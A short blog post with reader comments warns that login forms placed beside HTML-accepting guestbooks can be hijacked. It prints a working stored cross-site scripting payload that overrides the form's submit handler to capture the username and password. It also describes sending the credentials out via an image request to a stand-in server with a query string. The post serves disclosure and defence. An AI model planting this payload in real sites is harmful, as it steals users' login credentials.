Move login forms to a separate page!

I looked around the web for websites with security leaks. After months there is no change on the webmasters' side: they still offer login textboxes side-by-side with guestbooks or weblogs. Some weeks ago I posted a sample on how to get JavaScript executed on a website with a mouseover, but that one was not very good...

Today I will show code that obtains the username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or weblog entry if they accept HTML; they do not even have to allow <SCRIPT> tags:

<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

Now, when the page is displayed, the onreadystatechange event fires (note: onreadystatechange on an <img> is an Internet Explorer event; an onerror handler on an image that does not exist, or an onload handler, does the same job in any browser. The trans.gif must be available on that website, but it can be replaced by any other image). The handler replaces the login form's onsubmit with our own function. When you click submit (i.e. log in), a message box appears showing your credentials. It is just as easy to load a second image from your server with the credentials as query-string arguments, such as http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.

I created this small script to show you how easy it still is to obtain user credentials.

To be secure, put the login form on a separate page, and HTML-encode everything visitors post so that their markup is shown as text rather than executed!!!

If you need assistance preventing such security leaks, go to http://www.schwarz-interactive.de for help.

4 Comments

  • Phil Scott said

    Of course, you could encode the messages so that they aren't interpreted as HTML, which you should be doing anyway on a guestbook or something similar (i.e. this comments box)

  • Jerry Pisk said

    But a lot of forums do not encode, and allow [some] html tags to be included.

    Btw if you want to be safe and use an image that doesn't exist just use the onerror event handler.

  • Michael Schwarz said

    @Phil Scott: Yes, you can encode your messages, but sometimes you want to allow HTML fragments. I would say that if you filter the message so that there is no SCRIPT tag and all events are removed, it can be safe.
